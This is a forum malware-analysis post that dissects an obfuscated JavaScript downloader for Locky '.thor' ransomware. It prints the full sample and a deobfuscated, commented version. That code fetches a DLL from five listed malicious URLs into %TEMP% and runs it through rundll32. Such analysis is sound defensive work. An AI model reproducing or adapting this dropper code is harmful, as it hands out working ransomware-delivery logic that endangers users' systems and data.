Malware Analysis Very bad obfuscation method :p - Nov,08 - locky .thor downloader

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Form https://malwaretips.com/threads/08-11-2016-4.65237/
Thanks to @Daniel Hidalgo

NRV_054BB15_.js

Why this sample ?

I think that my numerous children penguins at home could have made the same level of protection :D

I will show you an example of what must not be used on a script...
All AV tool that don't detect it at static / heuristic scan could be criticize

9/54
https://www.hybrid-analysis.com/sam...ecb4283681c611b19c41897377e?environmentId=100

1) What It looks like :

You really must look at the spoiler part :) :

TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2 = ["http ://henanbusiness.net/xzwl8m2b", "http ://himichesko-varna.com/fzqrolxe", "http ://fototour.pl/hv9wgx80", "http ://choopchirk.net/349u8", "http ://rokematin.com/3ekauq6y"];
KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6 = "r3wZioifc";

var Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2 = 1;

var Ya2c7p7u5v1j6w4b7z4e3p6q1s6x8c6g2q2w7y9v3g8c0u5l1e9t1g4t9r0z8h5n6d6t6l0f8a1h5d7e2k4p1u1y1i3y2j5z2j0f7 = 2;

var EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8 = 2;

var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";

var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");

var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");

var WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 = DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 + KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6;

var XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5 = WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 + ".d" + "ll";

var LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.Environment("System");

if (LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")

{

var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");

} else

{

var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");

}

var NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5 = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];

for (var TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 = 0; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 < NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5["length"]; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4++)

{

try

{

var Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0 = WScript["CreateObject"](NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5[TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4]);

break;

} catch (e)

{

continue;

}

};

var XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9 = new ActiveXObject("Scripting.FileSystemObject");

var Ya3e8q6b2p9n4v0x8t1n0f8h4i0x1x5f0r4n9v4j6o3e3v2i3l0v5g3h0u8b1n7x2x1u7q7f1r1t1s6k5d3w6z9p7w1v1f6c5n9y0 = 0;

for (var Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = 0; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 < TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2.length; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 + 1)

{

try

{
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["open"]("GET", TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2[Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7], false);

Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["send"]();

while (Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0.readystate < 4) WScript["Sleep"](100);

var TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8 = WScript["CreateObject"]("ADODB.Stream");

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["open"]();

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["type"] = Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2;

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["write"](Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["ResponseBody"]);

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["position"] = 0;

TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["SaveToFile"](XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5, EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8);


TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["close"]();

var Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7 = XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9.GetFile(XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5);

var JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 = Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7.ShortPath;

GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0["Run"](YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 + " " + JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 + ",woody");

WScript.Quit(0);

} catch (e) {
continue;
};

}

WScript.Quit(0);

some parts :

var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";

var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");

var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");


2-2) A quick look at the code give us a lot of infos :

- all variables are very long names to "obfuscate"
- all important value are in clear (for building object, using functions...)
- formatting is very chaotic.​

2-3) Replacement of variable names :

tab_URLs = [
"http: //henanbusiness.net/xzwl8m2b",
"http: //himichesko-varna.com/fzqrolxe",
"http: //fototour.pl/hv9wgx80",
"http: //choopchirk.net/349u8",
"http: //rokematin.com/3ekauq6y"​
];

file = "
r3wZioifc";

=> Name
var type = 1;
var para_save_file = 2;

var shell = WScript["
CreateObject"]("WScript.Shell");

=> object Shell created
var path = shell.ExpandEnvironmentStrings("%TEMP%/");

=> %TEPMP%/ => C:\Users\DardiM\AppData\Local\Temp
var path_file = path + file;

=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc
var path_file_dll = path_file + ".d" + "ll";

=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var tab_of_system_strings = shell.Environment("System");

if (tab_of_system_strings ("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
=> Which processor archichecture is used ?

var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
=> 64 bit : C:\Windows\SysWOW64\rundll32.exe
} else {

var path_rundll32 = shell.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
=> 32 bit C:\Windows\System32\rundll32.exe
}

var tab_Method_HTTP = [

"MSXML2.XMLHTTP",
"WinHttp.WinHttpRequest.5.1"​
];
=> methods that can be used for connections
for (var index = 0; index < tab_Method_HTTP["length"]; index++)
{
try
{
var obj_http = WScript["CreateObject"](tab_Method_HTTP[index]);

=> creates an Http objct from the tab that contains two methods

break;

=> if One method works : quit the for LOOP
} catch (e)

{

continue;

=> continue until one method works
}
};

var obj_FSO = new
ActiveXObject("Scripting.FileSystemObject");

for (var index = 0; index < tab_URLs.length; index = index + 1)
{

try
{
obj_http["
open"]("GET", tab_URLs[index], false);
obj_http["
send"]();

while (obj_http.
readystate < 4)
WScript["
Sleep"](100);

var obj_stream = WScript["
CreateObject"]("ADODB.Stream");

=> object stream created to retrive the response of the request
obj_stream["open"]();
obj_stream["
type"] = type;

obj_stream["
write"](obj_http["ResponseBody"]);

=> response data written on the stream
obj_stream["position"] = 0;
obj_stream["
SaveToFile"](path_file_dll, para_save_file);

=> File saved ; overwrite if already exists, para_save_file : 2
obj_stream["close"]();

var obj_File = obj_FSO.GetFile(path_file_dll);

=> C:\Users\DardiM\AppData\Local\Temp\r3wZioifc.dll
var small_file_path = obj_File.ShortPath;

=> get the short file name : C:\Users\DardiM\AppData\Local\Temp\R3WZIO~1.DLL
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");

WScript.Quit(0);

} catch (e) {
continue;
};

}
WScript.Quit(0);
3) Conclusion :

A very easy to understand script, with only very long var names why random letters.

From :

http ://henanbusiness.net/xzwl8m2b,
http ://himichesko-varna.com/fzqrolxe,
http ://fototour.pl/hv9wgx80,
http ://choopchirk.net/349u8,
http ://rokematin.com/3ekauq6y​

The first URL that works allows to download a file :

- r3wZioifc.dll
on the folder :

- C:\Users\DardiM\AppData\Local\Temp\
Run part :

Using the rundll32 determinate for our OS version :

=> C:\Windows\SysWOW64\rundll32.exe
=> C:\Windows\System32\rundll32.exe
shell["Run"](path_rundll32 + " " + small_file_path + ",woody");

=> small_file_path : "C:\Users\fredd\AppData\Local\Temp\\R3WZIO~1.DLL"

=>
entry point of the dll : woody => necessary to make the work
Payload : Locky .thor
Very easy method used....
A very good example to begin to learn malware scripts to your children ...:D
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top